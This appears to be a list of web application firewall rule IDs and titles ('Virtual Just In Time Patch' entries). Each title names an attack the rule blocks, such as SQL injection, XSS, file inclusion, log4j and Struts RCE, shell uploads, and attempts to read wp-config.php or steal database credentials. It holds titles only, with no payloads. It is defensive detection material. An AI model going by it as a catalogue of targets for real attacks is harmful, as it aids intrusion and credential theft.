+330600:: Virtual Just In Time Patch: LXLabs SQL injection attack
+330601:: Virtual Just In Time Patch: WebInspect Scanner Attack
+330603:: Virtual Just In Time Patch: Joomla invalid characters
+330604:: Virtual Just In Time Patch: faq.php Cid ARG SQL injection
+330605:: Virtual Just In Time Patch: search_result.php HOSTid ARG SQL injection
+330701:: CVE-2014-6271 Bash Attack
+330702:: CVE-2014-6271 Bash Attack
+331323:: Virtual Just In Time Patch: Potential Owncloud information leakage attack blocked
+331357:: Virtual Just In Time Patch: WHMCS SQL injection attack
+331358:: Virtual Just In Time Patch: Vbulletin zero day attack
+331702:: Possible JSON-Based SQL Injection
+331704:: Really Simple SSL authentication bypass attack
+332751:: b2evolution CMS 6.6.0 - 6.8.10 PHP code execution attack blocked
+332791:: Apache Struts RCE Attack
+333358:: Virtual Just In Time Patch: Potential JCE image manager attack
+333359:: Virtual Just In Time Patch: JCE image attempt to rename image file to PHP attack
+333458:: Virtual Just In Time Patch: DOKEOS ce30 Authentication Bypass attack blocked
+334071:: Known PHP code injection Attack
+334072:: CVE-2019-6703 Attack blocked
+334073:: Injection Attack blocked
+334168:: Request content type header contains invalid characters
+334616:: Virtual Just In Time Patch: Possible Advanced Access Manager attack attempt
+334617:: Virtual Just In Time Patch: WP User Avatar plugin privilege escalation attack attempt
+336359:: Virtual Just In Time Patch: Wordpress pingback zombie attack
+336459:: Virtual Just In Time Patch: Plesk secret_key attack
+336460:: Virtual Just In Time Patch: Open Flash Charts File Upload Attack
+336461:: Virtual Just In Time Patch: Possible attempt to maliciously access wp-config.php file
+336463:: Virtual Just In Time Patch: antMan &lt;= 0.9.0c Authentication Bypass attack blocked
+336467:: Virtual Just In Time Patch: Possible chained PHP array injection attack
+336468:: Virtual Just In Time Patch: Google Maps plugin for Joomla probe
+336469:: Virtual Just In Time Patch: Wordpress Stored XSS Attack
+336477:: Virtual Just In Time Patch: Magento Shoplift attack
+336478:: Virtual Just In Time Patch: ModX Revolution 2.3.5-pl Cross Site Scripting attack
+336479:: Virtual Just In Time Patch: Wordpress DOM XSS Attack
+337106:: Virtual Just In Time Patch: Joomla RCE attack blocked
+337107:: Virtual Just In Time Patch: Joomla RCE attack blocked
+337109:: Virtual Just In Time Patch: SSRF attack blocked
+337110:: Virtual Just In Time Patch: AWS SSRF attack blocked
+337111:: Virtual Just In Time Patch: AWS SSRF attack blocked
+337181:: Virtual Just In Time Patch: Possible memcached SSRF attack blocked
+337206:: Virtual Just In Time Patch: Struts RCE attack blocked
+337207:: Virtual Just In Time Patch: Java RCE attack blocked
+337208:: Virtual Just In Time Patch: Struts RCE attack blocked
+337209:: Virtual Just In Time Patch: Java remote code injection blocked
+337210:: Virtual Just In Time Patch: Java RCE attack blocked
+337211:: Virtual Just In Time Patch: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) blocked
+337218:: Virtual Just In Time Patch: Struts RCE attack blocked
+337469:: Virtual Just In Time Patch: Wordpress Revslider upload Attack
+337470:: Virtual Just In Time Patch: Wordpress uploadify upload Attack
+337471:: Virtual Just In Time Patch: uploadify non-media file upload violation
+337472:: Virtual Just In Time Patch: Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution attempt
+337473:: Virtual Just In Time Patch: Generic wordpress plugins Upload Filter Bypass Remote file access attempt
+337474:: Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack
+337475:: Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack
+337476:: Virtual Just In Time Patch: uploadify RFI attack blocked
+337479:: Virtual Just In Time Patch: Wordpress Revslider non-image file download Attack
+339207:: Virtual Just In Time Patch: Struts CVE-2020-17530 RCE attack blocked
+340000:: Virtual Just In Time Patch: Solarwinds backdoor attempt
+340001:: Virtual Just In Time Patch: Solarwinds backdoor attempt
+343433:: Just in Time Virtual Patch:  SQL injection
+343478:: Virtual Just In Time Patch: Collabtive 2.0 Shell Upload attack
+343481:: Virtual Just In Time Patch: Vtiger CRM 6.3 Remote Code Execution attack
+344477:: Virtual Just In Time Patch: ProjeQtor 4.5.2 Shell Upload attack
+344479:: Virtual Just In Time Patch: Centreon 2.6.1 Command Injection Vulnerability attack
+344577:: Virtual Just In Time Patch: Magmi file recursion attack 
+345113:: Virtual Just In Time Patch: JIRA CVE-2021-26086 attack blocked
+345114:: Virtual Just In Time Patch: log4j CVE-2021-44228 obfuscated attack blocked
+345115:: Virtual Just In Time Patch: log4j CVE-2021-44228 attack blocked
+345117:: Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked
+345118:: Virtual Just In Time Patch: log4j CVE-2021-44228 broad scope obfuscated attack blocked
+347147:: Wordpress admin-ajax XSS attack
+347148:: Wordpress admin-ajax Live Chat plugin XSS attack
+347149:: Wordpress admin-ajax file injection attack
+347150:: WordPress GDPR Compliance Plugin Exploit blocked
+347151:: WordPress Kiwi Social Plugin Exploit blocked
+347152:: WordPress Kiwi Social Plugin Exploit blocked
+347153:: WordPress Kiwi Social Plugin Exploit blocked
+347154:: WordPress Kiwi Social Plugin Exploit blocked
+347155:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347156:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347157:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347158:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347159:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347160:: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked
+347195:: PHP function in HTTP header attack blocked
+347474:: Virtual Just In Time Patch: vBulletin Memcache Remote Code Execution Attack
+347475:: Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack
+347476:: Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack
+348476:: Virtual Just In Time Patch: Wordpress Plugin Navis Documentcloud XSS Vulnerability attack
+348477:: Virtual Just In Time Patch: Pluck remote code injection attack 
+348478:: Virtual Just In Time Patch: Pluck recon phpinfon attack 
+350023:: Non-Existant File Google Recon attempt
+356710:: Virtual Just In Time Patch: Wordpress PHP Anywhere &lt; 3.0.0 - Remote Code Execution
+364577:: Virtual Just In Time Patch: Bigware Shop 2.3.01 File Upload Attack blocked
+366000:: Virtual Just In Time Patch: XSS attack
+366001:: Virtual Just In Time Patch: XSS attack
+366002:: Virtual Just In Time Patch: XSS attack
+370651:: Virtual Just In Time Patch: Possible Floating Point DoS Attack
+370652:: Virtual Just In Time Patch: Apache Struts Probe
+370662:: Virtual Just In Time Patch: Apache Struts Probe
+372356:: Virtual Just In Time Patch: a2billing Probe
+373357:: Virtual Just In Time Patch: DedeCMSv5 Probe
+374533:: Virtual Just In Time Patch: SQL injection attack
+375357:: Virtual Just In Time Patch: Themegrill site reset attempt blocked
+376416:: Virtual Just In Time Patch: W3 Total Cache vulnerablity
+376419:: Virtual Just In Time Patch: Possible Ruby on Rails XML Exploit Attempt
+376476:: Virtual Just In Time Patch: VBulleting Code Injection Attack Blocked
+378371:: Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity
+378491:: Virtual Just In Time Patch: Possible Attempt to Exploit PHP CGI command injection vulnerablity
+378492:: Virtual Just In Time Patch: Roundcube LFI vulnerablity
+378497:: Virtual Just In Time Patch: Unauthorized Proxying of Website by .stfi.re
+380005:: PHP session cookie attack
+380100:: Virtual Just In Time Patch: phpLDAPadmin welcome.php Arbitrary File Inclusion
+380101:: Virtual Just In Time Patch: Simple PHP Blog comment_delete_cgi.php Arbitrary File Deletion
+380102:: Virtual Just In Time Patch: AutoLinks Pro File Inclusion Vulnerability
+380103:: Virtual Just In Time Patch: Simple PHP Blog Image File Upload Vulnerability 
+380104:: Virtual Just In Time Patch: PhpWebNotes Include File Error in php_api.php:
+380105:: Virtual Just In Time Patch: CMS Made Simple File Inclusion
+380106:: Virtual Just In Time Patch:  Phorum username Script Insertion Vulnerability
+380107:: Virtual Just In Time Patch: SimplePHPBplog Vulnerability
+380108:: Virtual Just In Time Patch: SimplePHPBplog Vulnerability
+380111:: Virtual Just In Time Patch: aMember Pro Remote File Inclusion Vulnerability
+380112:: Virtual Just In Time Patch: CuteNews Input Validation Vulnerability
+380201:: Virtual Just In Time Patch: XSS exploit in Sodahead Polls wordpress plugin
+380202:: Virtual Just In Time Patch: XSS exploit in Rating-Widget wordpress plugin
+380215:: Virtual Just In Time Patch: TimThumb Command Injection Attempt
+380657:: Virtual Just In Time Patch: Possible phpbb blind SQL injection attack
+380800:: Virtual Just In Time Patch: PHP Easter Egg Access
+380801:: Virtual Just In Time Patch: PHP Easter Egg Access
+381202:: Virtual Just In Time Patch: TimThumb Remote Code Execution Vulnerability Exploit attempt
+381203:: Virtual Just In Time Patch: TimThumb Non Image Upload Attempt
+381204:: Virtual Just In Time Patch: iBrowser Plugin Probe
+381205:: Virtual Just In Time Patch: Curltest Probe
+381206:: Virtual Just In Time Patch: Access to WordPress configuration file blocked
+381209:: Virtual Just In Time Patch: Wordpress Request is missing required parameters.
+381210:: Virtual Just In Time Patch: Multiple Cross Site Scripting Vulnerabilities in \
+381211:: Virtual Just In Time Patch: MySQL Server Username/Password Disclosure Vulnerability via \
+381214:: Virtual Just In Time Patch: TimThumb Command Injection Attempt
+381215:: Virtual Just In Time Patch: Dbase SQL injection attack
+381236:: Virtual Just In Time Patch: Access to non media file uploaded via grapfile WP plugin denied
+381237:: Virtual Just In Time Patch: DLINK worm probe
+381238:: Virtual Just In Time Patch: /info/whitelist.pac worm probe
+381239:: Virtual Just In Time Patch: XSS attack
+381628:: Virtual Just In Time Patch: Zen Cart SQL injection exploit
+382238:: Virtual Just In Time Patch: PHP file execution in uploads directory denied
+382240:: Virtual Just In Time Patch: JBOSS probe denied
+382241:: Virtual Just In Time Patch: auth.login_form probe blocked
+382242:: Virtual Just In Time Patch: auth.login_form probe blocked
+382245:: Virtual Just In Time Patch: Access attempt or probe for known vulnerable yuzo-related-post Plugin blocked
+382291:: Virtual Just In Time Patch: JIRA SSRF attack blocked
+382292:: Virtual Just In Time Patch: JIRA attack blocked
+383709:: Virtual Just In Time Patch: KingComposer XSS attack blocked
+383769:: Virtual Just In Time Patch: WooCommerce attack blocked
+384545:: Virtual Just In Time Patch: Joomla Media Manager File Upload Bypass Attack
+388000:: Virtual Just In Time Patch: Possible Attempt to Access vulnerable FCKeditor file upload connector (Disable if you have configured this connector to require authentication)
+390001:: Virtual Just In Time Patch: aWebBB XSS attack on post.php
+390002:: Virtual Just In Time Patch: aWebBB XSS attack on editac.php
+390003:: Virtual Just In Time Patch: aWebBB XSS attack on register.php
+390004:: Virtual Just In Time Patch: Possible SQL injection attack
+390005:: Virtual Just In Time Patch: aWebBB SQL attack
+390006:: Virtual Just In Time Patch: phpBB cur_password XSS attack
+390007:: Virtual Just In Time Patch: PHPNuke-Clan 3.0.1 Remote File Inclusion Exploit
+390008:: Virtual Just In Time Patch: Claroline &lt;= 1.7.4 scormExport.inc.php remote command vuln
+390009:: Virtual Just In Time Patch: Claroline &lt;= 1.7.4 scormExport.inc.php remote command vuln
+390010:: Virtual Just In Time Patch: Claroline &lt;= 1.7.4 XSS attack
+390011:: Virtual Just In Time Patch: aWebNews XSS attack
+390012:: Virtual Just In Time Patch: aWebBBNewsSQL attack
+390013:: Virtual Just In Time Patch: aWebBBNewsSQL attack
+390014:: Virtual Just In Time Patch: aWebAPP XSS attack
+390015:: Virtual Just In Time Patch: qliteNEws SQL injection attack
+390017:: Virtual Just In Time Patch: RedCMS SQL Injection
+390018:: Virtual Just In Time Patch: RedCMS XSS attack
+390019:: Virtual Just In Time Patch: Oxygen SQL Injection
+390020:: Virtual Just In Time Patch: Mantis XSS attack
+390021:: Virtual Just In Time Patch: Oxygen SQL Injection
+390022:: Virtual Just In Time Patch: Mantis XSS attack
+390023:: Virtual Just In Time Patch: PHPCollab v2.x / netOffice v2.x sendpassword.php SQL Injection
+390024:: Virtual Just In Time Patch: Sourceworkshop newsletter SQL Injection Vulnerability
+390025:: Virtual Just In Time Patch: X-Changer SQL Injection Vulnerability
+390026:: Virtual Just In Time Patch: X-Changer XSS Vulnerability
+390027:: Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities
+390028:: Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities
+390029:: Virtual Just In Time Patch: Null news Multiple SQL Injection Vulnerabilities
+390030:: Virtual Just In Time Patch: PHPLiveHelper 1.8 remote command execution Xploit
+390031:: Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities
+390032:: Virtual Just In Time Patch: Pixel Motion Blog SQL Injection Vulnerabilities
+390033:: Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability
+390035:: Virtual Just In Time Patch: TFT Gallery passwd Exposure of user Credentials
+390036:: Virtual Just In Time Patch: Nuked-Klan SQL Injection Vulnerability
+390037:: Virtual Just In Time Patch: WEBalbum Local File Inclusion Vulnerability
+390038:: Virtual Just In Time Patch: G-Book g_message Script Insertion Vulnerability
+390039:: Virtual Just In Time Patch: vwar_root remote/local file inclusion
+390040:: Virtual Just In Time Patch: Horde Help Module Remote Execution
+390042:: Virtual Just In Time Patch: Censtore.cgi exploit
+390043:: Virtual Just In Time Patch: quizz.pl exploit
+390044:: Virtual Just In Time Patch: phpinfo.cgi command execution
+390046:: Virtual Just In Time Patch: openEngine template Parameter Local File Inclusion Vulnerability
+390048:: Virtual Just In Time Patch: ManageEngine OpManager searchTerm Cross-Site Scripting
+390049:: Virtual Just In Time Patch: AliPAGER ubild Cross-Site Scripting and SQL Injection
+390050:: Virtual Just In Time Patch: MxBB Portal pafiledb Module module_root_path File Inclusion
+390051:: Virtual Just In Time Patch: Jadu CMS register.php Cross-Site Scripting Vulnerabilities
+390052:: Virtual Just In Time Patch: OpenFAQ q Parameter Script Insertion Vulnerability
+390058:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390059:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390060:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390061:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390062:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390063:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390064:: Virtual Just In Time Patch: Wordpress shell injection Vulnerability
+390066:: Virtual Just In Time Patch: Horde passthru exploit
+390067:: Virtual Just In Time Patch: CMS-Bandits spaw_root File Inclusion Vulnerability
+390069:: Virtual Just In Time Patch: Admanager Pro exploit
+390071:: Virtual Just In Time Patch: Bible Portal Project destination File Inclusion Vulnerability
+390072:: Virtual Just In Time Patch: Flipper Poll root_path File Inclusion Vulnerability
+390073:: Virtual Just In Time Patch: PictureDis Products lang Parameter File Inclusion Vulnerability
+390074:: Virtual Just In Time Patch: Joomla/Mambo Weblinks blind SQL injection
+390076:: Virtual Just In Time Patch: Generic m2f_root_path File Inclusion Vulnerability
+390077:: Virtual Just In Time Patch: Generic PHP download incddir File Inclusion Vulnerability
+390078:: Virtual Just In Time Patch: SiteDepth CMS SD_DIR Parameter Handling Remote File Inclusion Vulnerability
+390079:: Virtual Just In Time Patch: PhpLinkExchange page Parameter Handling Remote File Inclusion Vulnerability
+390081:: Virtual Just In Time Patch: authldap Remote File Inclusion Vulnerability
+390082:: Virtual Just In Time Patch: globalheader domain variable Remote File Inclusion Vulnerability
+390083:: Virtual Just In Time Patch: tikiwiki XSS Vulnerability
+390084:: Virtual Just In Time Patch: Generic BBCodeFile variable Remote File Inclusion Vulnerability
+390085:: Virtual Just In Time Patch: Generic wb_class_dir variable Remote File Inclusion Vulnerability
+390086:: Virtual Just In Time Patch: Generic component_dir variable Remote File Inclusion Vulnerability
+390087:: Virtual Just In Time Patch: Generic da_path variable Remote File Inclusion Vulnerability
+390088:: Virtual Just In Time Patch: Generic spaw_root variable Remote File Inclusion Vulnerability
+390089:: Virtual Just In Time Patch: Generic sitee variable Remote File Inclusion Vulnerability
+390090:: Virtual Just In Time Patch: file_upload sbp variable Remote File Inclusion Vulnerability
+390091:: Virtual Just In Time Patch: viewtopic sid variable Remote File Inclusion Vulnerability
+390092:: Virtual Just In Time Patch: PHP default_path variable Remote File Inclusion Vulnerability
+390093:: Virtual Just In Time Patch: get_infochannel root_path variable Remote File Inclusion Vulnerability
+390094:: Virtual Just In Time Patch: Generic root_path variable Remote File Inclusion Vulnerability
+390095:: Virtual Just In Time Patch: TikiWiki Multiple Cross-Site Scripting Vulnerabilities
+390097:: Virtual Just In Time Patch: MyNewsGroups myng_root Remote File Inclusion Vulnerability
+390099:: Virtual Just In Time Patch: TikiWiki non-image upload exploit
+390100:: Virtual Just In Time Patch: pageheaderdefault sysSessionPath upload exploit
+390101:: Virtual Just In Time Patch: possible vulnscan6 exploit
+390102:: Virtual Just In Time Patch: Socketwiz Bookmarks root_dir File Inclusion Vulnerability
+390104:: Virtual Just In Time Patch: Vivvo Article Management CMS SQL Injection
+390105:: Virtual Just In Time Patch: Vivvo Article Management CMS File Inclusion
+390106:: Virtual Just In Time Patch: RaidenHTTPD SoftParserFileXml File Inclusion Vulnerability
+390107:: Virtual Just In Time Patch: mcGalleryPRO path_to_folder File Inclusion Vulnerability
+390108:: Virtual Just In Time Patch: Timesheet PHP username Parameter SQL Injection
+390109:: Virtual Just In Time Patch: CCleague Pro language Parameter Local File Inclusion
+390110:: Virtual Just In Time Patch: TWiki filename Parameter Disclosure of Sensitive information
+390111:: Virtual Just In Time Patch: photokorn dir_path File Inclusion Vulnerabilities
+390112:: Virtual Just In Time Patch: Somery skindir File Inclusion Vulnerability
+390113:: Virtual Just In Time Patch: DokuWiki TARGET_FN directory Traversal Vulnerability
+390114:: Virtual Just In Time Patch: Fantastic News config[script_path] File Inclusion Vulnerabilities
+390133:: Virtual Just In Time Patch: phpGroupWare Local File Inclusion Vulnerabilities
+390134:: Virtual Just In Time Patch: ExBB Italia exbb[home_path] File Inclusion Vulnerability
+390135:: Virtual Just In Time Patch: Web3news PHPSECURITYADMIN_path File Inclusion Vulnerabilities
+390136:: Virtual Just In Time Patch: phpCOIN _ccfg[_pkg_path_incl] File Inclusion
+390153:: Virtual Just In Time Patch: Servlet Auth exposure Vulnerability
+390154:: Virtual Just In Time Patch: Eazy Cart SQL injection
+390155:: Virtual Just In Time Patch: Eazy Cart Customer Data Access
+390156:: Virtual Just In Time Patch: Eazy Cart XSS ATTACK
+390157:: Virtual Just In Time Patch: WebYep webyep_sIncludePath File Inclusion Vulnerabilities
+390158:: Virtual Just In Time Patch: Travelsized CMS setup_folder File Inclusion Vulnerabilities
+390161:: Virtual Just In Time Patch: OpenBiblio File Inclusion Vulnerabilities
+390162:: Virtual Just In Time Patch: BasiliX BSX_LIBDIR File Inclusion Vulnerabilities
+390164:: Virtual Just In Time Patch: DeluxeBB teplatefolder File Inclusion Vulnerabilities
+390166:: Virtual Just In Time Patch: xcart remote include
+390167:: Virtual Just In Time Patch: amamber remote include
+390168:: Virtual Just In Time Patch: e-Classifieds Corporate Edition db Cross-Site Scripting
+390169:: Virtual Just In Time Patch: Xpoze reed SQL Injection Vulnerability
+390170:: Virtual Just In Time Patch: LinPHA maps_type Local File Inclusion Vulnerability
+390171:: Virtual Just In Time Patch: Mole viewsource.php Information Disclosure Vulnerabilities
+390172:: Virtual Just In Time Patch: Aztech ADSL2/2 remote root 
+390173:: Virtual Just In Time Patch: index.php cat SQL injection
+390174:: Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php f parameter Function Injection Vulnerability
+390175:: Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php link inclusion attempt
+390176:: Virtual Just In Time Patch: Tikiwiki lost password XSS
+390177:: Virtual Just In Time Patch: TikiWiki featured link XSS attempt
+390178:: Virtual Just In Time Patch: Horde Webmail XSS
+390179:: Virtual Just In Time Patch: gCards 1.46 SQL
+390180:: Virtual Just In Time Patch: RedDot CMS SQL injection vulnerability
+390181:: Virtual Just In Time Patch: Joovili category SQL injection vulnerability
+390182:: Virtual Just In Time Patch: Jokes Script catagorie SQL injection vulnerability
+390183:: Virtual Just In Time Patch: WordPress download Monitor Plugin id SQL injection vulnerability
+390184:: Virtual Just In Time Patch: Bits Listing Injection vulnerability
+390185:: Virtual Just In Time Patch: SendReminders Injection vulnerability
+390186:: Virtual Just In Time Patch: tikiprint page Injection vulnerability
+390187:: Virtual Just In Time Patch: up.php my_root Injection vulnerability
+390188:: Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php path recursion Vulnerability
+390189:: Virtual Just In Time Patch: Tikiwiki file access and injection Vulnerability
+390190:: Virtual Just In Time Patch: Forcedownload file Injection vulnerability
+390191:: Virtual Just In Time Patch: Config path_to_root Injection vulnerability
+390192:: Virtual Just In Time Patch: search.php exec Injection vulnerability
+390193:: Virtual Just In Time Patch: Join.html file inclusion vulnerability
+390194:: Virtual Just In Time Patch: wp-download SQL injection vulnerability
+390195:: Virtual Just In Time Patch: index.php menu_id SQL injection vulnerability
+390196:: Virtual Just In Time Patch: links.asp SQL injection vulnerability
+390197:: Virtual Just In Time Patch: class.admin_menu_lms.php injection vulnerability
+390198:: Virtual Just In Time Patch: admin_frame.php ltarget injection vulnerability
+390199:: Virtual Just In Time Patch: FOG Forum injection vulnerability
+390200:: Virtual Just In Time Patch: Joomla token exploit
+390201:: Virtual Just In Time Patch: CoAST sections_file File Inclusion Vulnerability
+390202:: Virtual Just In Time Patch: PHP-Lance catid SQL Injection Vulnerability
+390203:: Virtual Just In Time Patch: Pro Chat Rooms gud SQL Injection Vulnerability
+390204:: Virtual Just In Time Patch: no_url ARG URI injection
+390205:: Virtual Just In Time Patch: Coppermine Photo Gallery relocate_server.php Exposure of Configuration
+390206:: Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
+390207:: Virtual Just In Time Patch: WebCalendar http Response Splitting and SQL Injection Vulnerabilities
+390208:: Virtual Just In Time Patch: Generic Remote PHP injection
+390282:: Virtual Just In Time Patch: page_tail RFI injection Vulnerability
+390430:: Virtual Just In Time Patch: AgileBill id SQL Injection Vulnerability
+390431:: Virtual Just In Time Patch: vTiger code inclusion attack
+390432:: Virtual Just In Time Patch: Joomla! mod_poll SQL Injection
+390433:: Virtual Just In Time Patch: CommodityRentals user_id SQL Injection Vulnerability
+390434:: Virtual Just In Time Patch: PmWiki 2.0.12 Cross Site Scripting
+390437:: Virtual Just In Time Patch: eyeOS Script Insertion and Exposure of user Credentials
+390438:: Virtual Just In Time Patch: SaveWebPortal menu_dx.php and menu_sx.php Multiple Variable XSS
+390439:: Virtual Just In Time Patch: PHP config recon attack
+390440:: Virtual Just In Time Patch: RSA ACE/agent for Web image Cross-Site Scripting Vulnerability
+390441:: Virtual Just In Time Patch: HP OpenView network Node Manager Remote Command Execution Attempt
+390444:: Virtual Just In Time Patch: YaPiG PHP XSS vulnerability
+390445:: Virtual Just In Time Patch: Known PHP Wormsign
+390446:: Virtual Just In Time Patch: Known Wormsign
+390447:: Virtual Just In Time Patch: Phorum Injection Attack
+390448:: Virtual Just In Time Patch: MediaWiki Cross-Site Scripting Vulnerabilities
+390449:: Virtual Just In Time Patch: http header PHP code injection attack
+390450:: Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability
+390451:: Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability
+390452:: Virtual Just In Time Patch: Mall23 eCommerce idPage SQL Injection Vulnerability
+390453:: Virtual Just In Time Patch: mimicboard2 Exposure of user Credentials
+390455:: Virtual Just In Time Patch: man2web cgi-scripts remote command spawn
+390457:: Virtual Just In Time Patch: Cisco IOS http configuration probe attempts
+390458:: Virtual Just In Time Patch: Test CGI probe
+390459:: Virtual Just In Time Patch: python namespace exposure with karrigell service
+390460:: Virtual Just In Time Patch: PHPlist SQL injection
+390461:: Virtual Just In Time Patch: PHPlist SQL injection
+390463:: Virtual Just In Time Patch: PHP-Fusion database backup file retrieval
+390464:: Virtual Just In Time Patch: cpanel XSS vulnerability
+390465:: Virtual Just In Time Patch: Forum Russian Board 4.2 Full command execution
+390466:: Virtual Just In Time Patch: Claroline E-Learning SQL injection
+390469:: Virtual Just In Time Patch: Invision Community Blog Module SQL injection
+390470:: Virtual Just In Time Patch: Javamail file access
+390471:: Virtual Just In Time Patch: Javamail information disclosure
+390472:: Virtual Just In Time Patch: sawmill remote file access
+390473:: Virtual Just In Time Patch: Gurgens Guest Book Remote Database Disclosure Vulnerability
+390474:: Virtual Just In Time Patch: Common http vulnerability
+390475:: Virtual Just In Time Patch: Apache Jakarta-Tomcat /admin Context Vulnerability
+390476:: Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability
+390477:: Virtual Just In Time Patch: PHP iCalendar File Inclusion Vulnerability and XSS
+390478:: Virtual Just In Time Patch: yawp file include Vulnerability
+390479:: Virtual Just In Time Patch: Yapig remote file include Vulnerability
+390480:: Virtual Just In Time Patch: MWChat file include Vulnerability
+390481:: Virtual Just In Time Patch: FileLister searchwhat Cross-Site Scripting Vulnerability
+390482:: Virtual Just In Time Patch: ManageEngine netFlow Analyzer Cross-Site Scripting Vulnerability
+390483:: Virtual Just In Time Patch: information Call Center Exposure of user Credentials
+390484:: Virtual Just In Time Patch: uguestbook Exposure of user Credentials
+390485:: Virtual Just In Time Patch: HTMLJunction EZGuestbook Remote Database Disclosure Vulnerability
+390486:: Virtual Just In Time Patch: Simple PHP Blog Exposure of user Credentials
+390487:: Virtual Just In Time Patch: OpenEdit Cross-Site Scripting Vulnerability
+390488:: Virtual Just In Time Patch: Nephp Publisher SQL Injection Vulnerabilities
+390489:: Virtual Just In Time Patch: Interchange Catalog Skeleton SQL Injection and ITL Injection Vulnerabilities
+390570:: Virtual Just In Time Patch: Owl SQL injection attack
+390571:: Virtual Just In Time Patch: Owl SQL injection attack
+390600:: Virtual Just In Time Patch: Joomla catid ARG SQL injection
+390601:: Virtual Just In Time Patch: Wordpress cat vuln
+390603:: Virtual Just In Time Patch: Joomla illegal characters in argument
+390604:: Virtual Just In Time Patch: Joomla ARG injection
+390606:: Virtual Just In Time Patch: Joomla ARG injection
+390608:: Virtual Just In Time Patch: Joomla template_css ARG injection
+390609:: Joomla ARGS Cross Site Scripting Attack
+390611:: Virtual Just In Time Patch: Joomla invalid characters
+390615:: Virtual Just In Time Patch: MyBulletinBoard SQL injection
+390627:: Virtual Just In Time Patch: possible fckeditor file upload attack (disable this rule if you use this function)
+390628:: Virtual Just In Time Patch: Zen Cart SQL injection exploit
+390630:: Virtual Just In Time Patch: Joomla invalid characters
+390633:: Virtual Just In Time Patch: Joomla invalid characters format variable in RSS request
+390634:: Virtual Just In Time Patch: Wordpress plugin WP-Syntax Remote Command Execution
+390637:: Virtual Just In Time Patch: Zencart PHP code injection attack
+390638:: Virtual Just In Time Patch: Zencart PHP code injection attack
+390643:: Virtual Just In Time Patch: Contact form XSS attack
+390644:: Virtual Just In Time Patch: MegaBook XSS attack
+390645:: Virtual Just In Time Patch: Joomla TagTrends variable injection attack
+390646:: Virtual Just In Time Patch: Joomla TagTrends variable injection attack
+390647:: Virtual Just In Time Patch: Horde command shell access
+390648:: Virtual Just In Time Patch: Horde command shell XSS attack
+390649:: Virtual Just In Time Patch: Possible vBulletin database credentials theft
+390650:: Virtual Just In Time Patch: Possible vBulletin database credentials theft
+390651:: Virtual Just In Time Patch: Joomla! Shoutbox Pro Component controller Local File Inclusion Vulnerability
+390652:: FreePHPBlogSoftware phpincdir File Inclusion Vulnerability
+390653:: Virtual Just In Time Patch: Possible XSS injection in ecommerce CGI
+390655:: Virtual Just In Time Patch: SYSURL RFI attack Vulnerability
+390656:: Virtual Just In Time Patch: get variable RFI attack Vulnerability
+390657:: Virtual Just In Time Patch: phpMyFAQ path recusion attack
+390659:: Virtual Just In Time Patch: WSN Forum id SQL Injection Vulnerability
+390660:: Virtual Just In Time Patch: Tunez SQL Injection and Cross-Site Scripting Vulnerabilities
+390662:: Virtual Just In Time Patch: Cross-Site Scripting Attempt in Host header
+390663:: Virtual Just In Time Patch: Nortel SSL VPN Web Interface  XSS
+390664:: Virtual Just In Time Patch: SyntaxCMS XSS vulnerability
+390665:: Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability
+390666:: Virtual Just In Time Patch: SiteSage norelay_highlight_words Cross-Site Scripting Vulnerability
+390667:: Virtual Just In Time Patch: Non Existent File Hack Probe
+390668:: Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability
+390669:: Virtual Just In Time Patch: SocketKB 1.1.x file include Vulnerability 
+390671:: Virtual Just In Time Patch: SEO-Board SQL Injection Vulnerability
+390672:: Virtual Just In Time Patch: CJ LinkOut 123 Cross-Site Scripting Vulnerability
+390673:: Virtual Just In Time Patch: jPortal download search SQL Injection Vulnerability
+390674:: Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities
+390675:: Virtual Just In Time Patch: CJ Tag Board Cross-Site Scripting Vulnerabilities
+390676:: Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities
+390677:: Virtual Just In Time Patch: CJ Web2Mail Cross-Site Scripting Vulnerabilities
+390678:: Virtual Just In Time Patch: postnuke Local file inclusion via GeSHi library
+390679:: Virtual Just In Time Patch: PHP-Fusion msg_send SQL Injection Vulnerability 
+390680:: Virtual Just In Time Patch: SquirrelMail Address Add Plugin first Cross-Site Scripting
+390681:: Virtual Just In Time Patch: Tikiwiki forumid RFI injection attack
